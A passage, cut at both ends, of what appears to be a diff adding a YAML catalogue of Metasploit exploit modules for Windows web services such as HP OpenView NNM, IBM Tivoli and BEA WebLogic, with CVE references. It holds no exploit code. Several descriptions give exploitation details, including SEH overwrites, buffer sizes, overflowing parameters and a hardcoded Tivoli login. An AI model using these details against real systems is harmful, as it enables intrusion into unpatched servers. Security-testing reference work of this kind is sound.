sub_405ee0(\"nnm\", \"webappmon\");\n\n\ + \t\t\t\tNo validation is done on the cookie argument. There are no stack cookies, so exploitation\n\ + \t\t\t\tis easily achieved by overwriting the saved return address or SEH frame.\n\n\ + \t\t\t\tThe original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n\ + \t\t\t\tpassed in a request ot \"webappmon.exe\". Further research shows that several different\n\ + \t\t\t\tcookie values, as well as several different CGI applications, can be used.\n\ + \t\t\t'" + authors: + - - CVE + - 2010-2709 + - - OSVDB + - "66932" + - - BID + - "42154" + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520 + - - URL + - http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_webappmon_execvp: + enable: true + msf: true + msf_key: windows/http/hp_nnm_webappmon_execvp + name: HP OpenView Network Node Manager execvp_nc Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\ + \t\t\t\tprior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n\ + \t\t\t\tparameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n\ + \t\t\t\tcause a stack-based buffer overflow and execute arbitrary code.\n\n\ + \t\t\t\tThis vulnerability is not triggerable via a GET request due to limitations on the\n\ + \t\t\t\trequest size. The buffer being targetted is 16384 bytes in size. There are actually two\n\ + \t\t\t\tadjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n\ + \t\t\t\tThe vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n\ + \t\t\t\tv 1.30.12.69. There are no stack cookies, so exploitation is easily achieved by\n\ + \t\t\t\toverwriting the saved return address or SEH frame.\n\n\ + \t\t\t\tThis vulnerability might also be triggerable via other CGI programs, however this was\n\ + \t\t\t\tnot fully investigated.\n\ + \t\t\t" + authors: + - - CVE + - 2010-2703 + - - OSVDB + - "66514" + - - BID + - "41829" + - - URL + - http://www.vupen.com/english/advisories/2010/1866 + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-137/ + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088 + path: extensions/metasploit/ + class: Msf_module +msf_steamcast_useragent: + enable: true + msf: true + msf_key: windows/http/steamcast_useragent + name: Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n\ + \t\t\t\t\tan overly long User-Agent in an HTTP GET request, an attacker may be able to\n\ + \t\t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0550 + - - OSVDB + - "42670" + - - URL + - http://aluigi.altervista.org/adv/steamcazz-adv.txt + - - BID + - "33898" + path: extensions/metasploit/ + class: Msf_module +msf_fdm_auth_header: + enable: true + msf: true + msf_key: windows/http/fdm_auth_header + name: Free Download Manager Remote Control Server Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Free Download Manager\n\ + \t\t\t\tRemote Control 2.5 Build 758. When sending a specially crafted\n\ + \t\t\t\tAuthorization header, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0183 + - - OSVDB + - "51745" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_ovwebsnmpsrv_main: + enable: true + msf: true + msf_key: windows/http/hp_nnm_ovwebsnmpsrv_main + name: HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\ + \t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\ + \t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n\ + \t\t\t\tThis vulnerability is triggerable via either a GET or POST request. The buffer being\n\ + \t\t\t\twritten to is 1024 bytes in size. It is important to note that this vulnerability must\n\ + \t\t\t\tbe exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n\ + \t\t\t\tThe vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n\ + \t\t\t\ttimestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n\ + \t\t\t\teasily achieved by overwriting SEH structures.\n\n\ + \t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\n\ + \t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\n\ + \t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\n\ + \t\t\t\teither.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1964 + - - OSVDB + - "65552" + - - BID + - "40873" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-108/ + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439 + path: extensions/metasploit/ + class: Msf_module +msf_ibm_tpmfosd_overflow: + enable: true + msf: true + msf_key: windows/http/ibm_tpmfosd_overflow + name: IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n\ + \t\t\t\tfor OS Deployment version 5.1.0.X.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1868 + - - OSVDB + - "34678" + - - BID + - "23264" + - - URL + - http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 + path: extensions/metasploit/ + class: Msf_module +msf_ibm_tsm_cad_header: + enable: true + msf: true + msf_key: windows/http/ibm_tsm_cad_header + name: IBM Tivoli Storage Manager Express CAD Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n\ + \t\t\t\tBy sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4880 + - - OSVDB + - "38161" + - - BID + - "25743" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_ovwebsnmpsrv_uro: + enable: true + msf: true + msf_key: windows/http/hp_nnm_ovwebsnmpsrv_uro + name: HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\ + \t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\ + \t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\ + \t\t\t\tThe vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n\ + \t\t\t\ttimestamp prior to April 7th, 2010.\n\n\ + \t\t\t\tReaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n\ + \t\t\t\twith a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n\ + \t\t\t\timportant to note that this vulnerability must be exploited by overwriting SEH. This is since\n\ + \t\t\t\toverflowing the buffer with controllable data always triggers an access violation when\n\ + \t\t\t\tattempting to write static text beyond the end of the stack.\n\n\ + \t\t\t\tExploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n\ + \t\t\t\tarbitrary code execution, a double-backward jump is used in combination with the Alpha2\n\ + \t\t\t\tencoder.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1960 + - - OSVDB + - "65427" + - - BID + - "40637" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-105/ + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439 + path: extensions/metasploit/ + class: Msf_module +msf_navicopa_get_overflow: + enable: true + msf: true + msf_key: windows/http/navicopa_get_overflow + name: NaviCOPA 2.0.1 URL Handling Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n\ + \t\t\t\tThe vulnerability is caused due to a boundary error within the\n\ + \t\t\t\thandling of URL parameters.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5112 + - - OSVDB + - "29257" + - - BID + - "20250" + path: extensions/metasploit/ + class: Msf_module +msf_manageengine_apps_mngr: + enable: true + msf: true + msf_key: windows/http/manageengine_apps_mngr + name: ManageEngine Applications Manager Authenticated Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\t\tThis module logs into the Manage Engine Appplications Manager to upload a \n\ + \t\t\t\t\tpayload to the file system and a batch script that executes the payload. " + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_sapdb_webtools: + enable: true + msf: true + msf_key: windows/http/sapdb_webtools + name: SAP DB 7.4 WebTools Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n\ + \t\t\t\tBy sending an overly long GET request, it may be possible for\n\ + \t\t\t\tan attacker to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3614 + - - OSVDB + - "37838" + - - BID + - "24773" + path: extensions/metasploit/ + class: Msf_module +msf_ibm_tivoli_endpoint_bof: + enable: true + msf: true + msf_key: windows/http/ibm_tivoli_endpoint_bof + name: IBM Tivoli Endpoint Manager POST Query Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack based buffer overflow in the way IBM Tivoli \n\ + \t\t\t\tEndpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query \n\ + \t\t\t\targuments.\n\n\ + \t\t\t\tThis issue can be triggered by sending a specially crafted HTTP POST request to \n\ + \t\t\tthe service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n\ + \t\t\tis required. This exploit makes use of a second vulnerability, a hardcoded account \n\ + \t\t\t(tivoli/boss) is used to bypass the authorization restriction.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1220 + - - OSVDB + - "72713" + - - OSVDB + - "72751" + - - BID + - "48049" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-169/ + path: extensions/metasploit/ + class: Msf_module +msf_apache_chunked: + enable: true + msf: true + msf_key: windows/http/apache_chunked + name: Apache Win32 Chunked Encoding + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the chunked transfer integer wrap\n\ + \t\t\t\tvulnerability in Apache version 1.2.x to 1.3.24. This\n\ + \t\t\t\tparticular module has been tested with all versions of the\n\ + \t\t\t\tofficial Win32 build between 1.3.9 and 1.3.24. Additionally,\n\ + \t\t\t\tit should work against most co-branded and bundled versions\n\ + \t\t\t\tof Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n\ + \t\t\t\tYou will need to use the Check() functionality to determine\n\ + \t\t\t\tthe exact target version prior to launching the exploit. The\n\ + \t\t\t\tversion of Apache bundled with Oracle 8.1.7 will not\n\ + \t\t\t\tautomatically restart, so if you use the wrong target value,\n\ + \t\t\t\tthe server will crash.\n\ + \t\t\t" + authors: + - - CVE + - 2002-0392 + - - OSVDB + - "838" + - - BID + - "5033" + - - URL + - http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html + path: extensions/metasploit/ + class: Msf_module +msf_hp_power_manager_login: + enable: true + msf: true + msf_key: windows/http/hp_power_manager_login + name: Hewlett-Packard Power Manager Administration Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n\ + \t\t\t\tSending a specially crafted POST request with an overly long Login string, an\n\ + \t\t\t\tattacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2685 + - - OSVDB + - "59684" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_openview5: + enable: true + msf: true + msf_key: windows/http/hp_nnm_openview5 + name: HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\ + \t\t\t\tBy sending a specially crafted CGI request, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-6204 + - - OSVDB + - "39530" + - - BID + - "26741" + path: extensions/metasploit/ + class: Msf_module +msf_psoproxy91_overflow: + enable: true + msf: true + msf_key: windows/http/psoproxy91_overflow + name: PSO Proxy v0.91 Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n\ + \t\t\t\tIf a client sends an excessively long string the stack is overwritten.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0313 + - - OSVDB + - "4028" + - - URL + - http://www.milw0rm.com/exploits/156 + - - BID + - "9706" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_snmpviewer_actapp: + enable: true + msf: true + msf_key: windows/http/hp_nnm_snmpviewer_actapp + name: HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\ + \t\t\t\tprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n\ + \t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n\ + \t\t\t\tcode.\n\n\ + \t\t\t\tThe vulnerable code lies within the a function within \"snmpviewer.exe\" with a\n\ + \t\t\t\ttimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n\ + \t\t\t\tor POST request. The request must contain 'act' and 'app' parameters which, when\n\ + \t\t\t\tcombined, total more than the 1024 byte stack buffer can hold.\n\n\ + \t\t\t\tIt is important to note that this vulnerability must be exploited by overwriting SEH.\n\ + \t\t\t\tWhile the saved return address can be smashed, a function call that occurs before\n\ + \t\t\t\tthe function returns calls \"exit\".\n\ + \t\t\t" + authors: + - - CVE + - 2010-1552 + - - OSVDB + - "64975" + - - BID + - "40068" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-083/ + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379 + path: extensions/metasploit/ + class: Msf_module +msf_mailenable_auth_header: + enable: true + msf: true + msf_key: windows/http/mailenable_auth_header + name: MailEnable Authorization Header Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a remote buffer overflow in the MailEnable web service.\n\ + \t\t\t\tThe vulnerability is triggered when a large value is placed into the Authorization\n\ + \t\t\t\theader of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and\n\ + \t\t\t\tMailEnable Professional versions prior to 1.55 are affected.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1348 + - - OSVDB + - "15913" + - - OSVDB + - "15737" + - - BID + - "13350" + - - NSS + - "18123" + path: extensions/metasploit/ + class: Msf_module +msf_efs_easychatserver_username: + enable: true + msf: true + msf_key: windows/http/efs_easychatserver_username + name: EFS Easy Chat Server Authentication Request Handling Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in EFS Software Easy Chat Server. By\n\ + \t\t\t\tsending a overly long authentication request, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\n\ + \t\t\t\tNOTE: The offset to SEH is influenced by the installation path of the program.\n\ + \t\t\t\tThe path, which defaults to \"C:\\Program Files\\Easy Chat Server\", is concatentated\n\ + \t\t\t\twith \"\\users\\\" and the string passed as the username HTTP paramter.\n\ + \t\t\t" + authors: + - - CVE + - 2004-2466 + - - OSVDB + - "7416" + - - BID + - "25328" + path: extensions/metasploit/ + class: Msf_module +msf_apache_modjk_overflow: + enable: true + msf: true + msf_key: windows/http/apache_modjk_overflow + name: Apache mod_jk 1.2.20 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is a stack buffer overflow exploit for mod_jk 1.2.20.\n\ + \t\t\t\tShould work on any Win32 OS.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0774 + - - OSVDB + - "33855" + - - BID + - "22791" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-07-008.html + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_toolbar_02: + enable: true + msf: true + msf_key: windows/http/hp_nnm_toolbar_02 + name: HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n\ + \t\t\t\tand 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n\ + \t\t\t\tattacker may be able to execute arbitrary code. Please note that this module only works\n\ + \t\t\t\tagainst a specific build (ie. NNM 7.53_01195)\n\ + \t\t\t" + authors: + - - CVE + - 2009-0920 + - - OSVDB + - "53242" + - - BID + - "34294" + - - URL + - http://www.coresecurity.com/content/openview-buffer-overflows + path: extensions/metasploit/ + class: Msf_module +msf_oracle9i_xdb_pass: + enable: true + msf: true + msf_key: windows/http/oracle9i_xdb_pass + name: Oracle 9i XDB HTTP PASS Overflow (win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the authorization\n\ + \t\t\t\tcode of the Oracle 9i HTTP XDB service. David Litchfield,\n\ + \t\t\t\thas illustrated multiple vulnerabilities in the Oracle\n\ + \t\t\t\t9i XML Database (XDB), during a seminar on \"Variations\n\ + \t\t\t\tin exploit methods between Linux and Windows\" presented\n\ + \t\t\t\tat the Blackhat conference.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0727 + - - OSVDB + - "2449" + - - BID + - "8375" + - - URL + - http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_nnmrptconfig_schdparams: + enable: true + msf: true + msf_key: windows/http/hp_nnm_nnmrptconfig_schdparams + name: HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n\ + \t\t\t\tthe overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n\ + \t\t\t\toverwrite data on the stack, and gain arbitrary code execution.\n\ + \t\t\t" + authors: + - - CVE + - 2011-0267 + - - OSVDB + - "70473" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-009/ + path: extensions/metasploit/ + class: Msf_module +msf_webster_http: + enable: true + msf: true + msf_key: windows/http/webster_http + name: Webster HTTP Server GET Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a stack buffer overflow in the Webster HTTP server.\n\ + \t\t\t\t\tThe server and source code was released within an article from\n\ + \t\t\t\t\tthe Microsoft Systems Journal in February 1996 titled \"Write a\n\ + \t\t\t\t\tSimple HTTP-based Server Using MFC and Windows Sockets\".\n\ + \t\t\t" + authors: + - - CVE + - 2002-2268 + - - OSVDB + - "44106" + - - BID + - "6289" + - - URL + - http://www.microsoft.com/msj/archive/s25f.aspx + - - URL + - http://www.netdave.com/webster/webster.htm + path: extensions/metasploit/ + class: Msf_module +msf_httpdx_handlepeer: + enable: true + msf: true + msf_key: windows/http/httpdx_handlepeer + name: HTTPDX h_handlepeer() Function Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The\n\ + \t\t\t\tvulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n\ + \t\t\t\tBy sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "58714" + - - CVE + - 2009-3711 + - - URL + - http://www.pank4j.com/exploits/httpdxb0f.php + - - URL + - http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/ + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_getnnmdata_maxage: + enable: true + msf: true + msf_key: windows/http/hp_nnm_getnnmdata_maxage + name: HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\ + \t\t\t\tBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1553 + - - OSVDB + - "64976" + path: extensions/metasploit/ + class: Msf_module +msf_hp_openview_insight_backdoor: + enable: true + msf: true + msf_key: windows/http/hp_openview_insight_backdoor + name: HP OpenView Performance Insight Server Backdoor Account Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n\ + \t\t\t\tclass. When using this account, an attacker can abuse the \n\ + \t\t\t\tcom.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system \n\ + \t\t\t\tallowing the execution of arbitary code.\n\n\ + \t\t\t\tNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\n\ + \t\t\t" + authors: + - - CVE + - 2011-0276 + - - OSVDB + - "70754" + path: extensions/metasploit/ + class: Msf_module +msf_bea_weblogic_transfer_encoding: + enable: true + msf: true + msf_key: windows/http/bea_weblogic_transfer_encoding + name: BEA Weblogic Transfer-Encoding Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack based buffer overflow in the BEA\n\ + \t\t\t\tWeblogic Apache plugin. This vulnerability exists in the\n\ + \t\t\t\terror reporting for unknown Transfer-Encoding headers.\n\ + \t\t\t\tYou may have to run this twice due to timing issues with handlers.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4008 + - - OSVDB + - "49283" + - - URL + - http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html + path: extensions/metasploit/ + class: Msf_module +msf_icecast_header: + enable: true + msf: true + msf_key: windows/http/icecast_header + name: Icecast (<= 2.0.1) Header Overwrite (win32) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the header parsing\n\ + \t\t\t\tof icecast, discovered by Luigi Auriemma. Sending 32 HTTP\n\ + \t\t\t\theaders will cause a write one past the end of a pointer\n\ + \t\t\t\tarray. On win32 this happens to overwrite the saved\n\ + \t\t\t\tinstruction pointer, and on linux (depending on compiler,\n\ + \t\t\t\tetc) this seems to generally overwrite nothing crucial (read\n\ + \t\t\t\tnot exploitable).\n\n\ + \t\t\t\t!! This exploit uses ExitThread(), this will leave icecast\n\ + \t\t\t\tthinking the thread is still in use, and the thread counter\n\ + \t\t\t\twon't be decremented. This means for each time your payload\n\ + \t\t\t\texits, the counter will be left incremented, and eventually\n\ + \t\t\t\tthe threadpool limit will be maxed. So you can multihit,\n\ + \t\t\t\tbut only till you fill the threadpool.\n\n\ + \t\t\t" + authors: + - - CVE + - 2004-1561 + - - OSVDB + - "10406" + - - BID + - "11271" + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html + path: extensions/metasploit/ + class: Msf_module +msf_amlibweb_webquerydll_app: + enable: true + msf: true + msf_key: windows/http/amlibweb_webquerydll_app + name: Amlibweb NetOpacs webquery.dll Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Amlib's Amlibweb\n\ + \t\t\t\tLibrary Management System (NetOpacs). The webquery.dll\n\ + \t\t\t\tAPI is available through IIS requests. By specifying\n\ + \t\t\t\tan overly long string to the 'app' parameter, SeH can be\n\ + \t\t\t\treliably overwritten allowing for arbitrary remote code execution.\n\ + \t\t\t\tIn addition, it is possible to overwrite EIP by specifying\n\ + \t\t\t\tan arbitrary parameter name with an '=' terminator.\n\ + \t\t\t" + authors: + - - OSVDB + - "66814" + - - URL + - http://www.aushack.com/advisories/ + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_toolbar_01: + enable: true + msf: true + msf_key: windows/http/hp_nnm_toolbar_01 + name: HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\ + \t\t\t\tBy sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0067 + - - OSVDB + - "53222" + - - BID + - "33147" + path: extensions/metasploit/ + class: Msf_module +msf_edirectory_imonitor: + enable: true + msf: true + msf_key: windows/http/edirectory_imonitor + name: eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in eDirectory 8.7.3\n\ + \t\t\t\tiMonitor service. This vulnerability was discovered by Peter\n\ + \t\t\t\tWinter-Smith of NGSSoftware.\n\n\ + \t\t\t\tNOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n\ + \t\t\t\tnot restart automatically in a default installation.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2551 + - - OSVDB + - "18703" + - - BID + - "14548" + path: extensions/metasploit/ + class: Msf_module +msf_altn_webadmin: + enable: true + msf: true + msf_key: windows/http/altn_webadmin + name: Alt-N WebAdmin USER Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tAlt-N WebAdmin is prone to a buffer overflow condition. This\n\ + \t\t\t\tis due to insufficient bounds checking on the USER\n\ + \t\t\t\tparameter. Successful exploitation could result in code\n\ + \t\t\t\texecution with SYSTEM level privileges.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0471 + - - OSVDB + - "2207" + - - BID + - "8024" + - - NSS + - "11771" + path: extensions/metasploit/ + class: Msf_module +msf_bea_weblogic_jsessionid: + enable: true + msf: true + msf_key: windows/http/bea_weblogic_jsessionid + name: BEA WebLogic JSESSIONID Cookie Value Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in BEA\\'s WebLogic plugin. The vulnerable\n\ + \t\t\t\tcode is only accessible when clustering is configured. A request containing a\n\ + \t\t\t\tlong JSESSION cookie value can lead to arbirtary code execution.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5457 + - - OSVDB + - "51311" + path: extensions/metasploit/ + class: Msf_module +msf_mcafee_epolicy_source: + enable: true + msf: true + msf_key: windows/http/mcafee_epolicy_source + name: McAfee ePolicy Orchestrator / ProtectionPilot Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the McAfee HTTP Server (NAISERV.exe).\n\ + \t\t\t\tMcAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n\ + \t\t\t\tknown to be vulnerable. By sending a large 'Source' header, the stack can\n\ + \t\t\t\tbe overwritten. This module is based on the exploit by xbxice and muts.\n\ + \t\t\t\tDue to size constraints, this module uses the Egghunter technique.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5156 + - - OSVDB + - "29421 " + - - URL + - http://www.milw0rm.com/exploits/2467 + - - URL + - http://www.remote-exploit.org/advisories/mcafee-epo.pdf + - - BID + - "20288" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_ovwebsnmpsrv_ovutil: + enable: true + msf: true + msf_key: windows/http/hp_nnm_ovwebsnmpsrv_ovutil + name: HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n\ + \t\t\t\tprior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n\ + \t\t\t\tCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n\ + \t\t\t\tThis vulnerability is triggerable via either a GET or POST request. It is interesting to\n\ + \t\t\t\tnote that this vulnerability cannot be exploited by overwriting SEH, since attempting\n\ + \t\t\t\tto would trigger CVE-2010-1964.\n\n\ + \t\t\t\tThe vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n\ + \t\t\t\twith a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n\ + \t\t\t\twhich is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. When\n\ + \t\t\t\tprocessing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n\ + \t\t\t\tThere are no stack cookies present, so exploitation is easily achieved by overwriting the\n\ + \t\t\t\tsaved return address.\n\n\ + \t\t\t\tThere exists some unreliability when running this exploit. It is not completely clear why\n\ + \t\t\t\tat this time, but may be related to OVWDB or session management. Also, on some attempts\n\ + \t\t\t\tOV NNM may report invalid characters in the URL. It is not clear what is causing this\n\ + \t\t\t\teither.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1961 + - - OSVDB + - "65428" + - - BID + - "40638" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-106/ + - - URL + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439 + path: extensions/metasploit/ + class: Msf_module +msf_intersystems_cache: + enable: true + msf: true + msf_key: windows/http/intersystems_cache + name: InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n\ + \t\t\t\tBy sending a specially crafted GET request, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "60549" + - - BID + - "37177" + path: extensions/metasploit/ + class: Msf_module +msf_integard_password_bof: + enable: true + msf: true + msf_key: windows/http/integard_password_bof + name: Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow + category: Metasploit + description: "\n\ + 